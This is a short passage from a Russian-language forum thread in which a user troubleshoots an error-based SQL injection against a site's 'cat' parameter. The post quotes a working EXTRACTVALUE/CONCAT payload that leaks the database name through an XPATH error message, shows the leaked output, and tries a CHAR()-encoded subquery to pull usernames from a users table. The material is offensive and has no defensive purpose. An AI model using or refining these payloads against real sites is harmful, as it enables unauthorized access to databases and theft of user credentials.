29.03.2016, 14:40
|
|
Участник форума
Регистрация: 22.07.2011
Сообщений: 229
С нами:
7794326
Репутация:
0
|
|
Сообщение от BabaDook
↑
char/hex base64 есть кодировки
использую это http://www.waraxe.us/sql-char-encoder.html
делаю запрос вида
cat=93) AND EXTRACTVALUE(1660,CONCAT(0x5c,0x71707a7671,(SELECT MID((DATABASE()),1,50)), (SELECT 123))) AND (1749=1749
Выводится...
Notice: Error: XPATH syntax error: '\qpzvqНАЗВАНИЕ_БД 123'
вместо (SELECT 123) пробую
(SELECT username FROM CONCAT(CHAR(116),CHAR(98),CHAR(108),CHAR(95),CHAR( 117),CHAR(115),CHAR(101),CHAR(114),CHAR(115)))
не проходит запрос - ошибка
|
|
|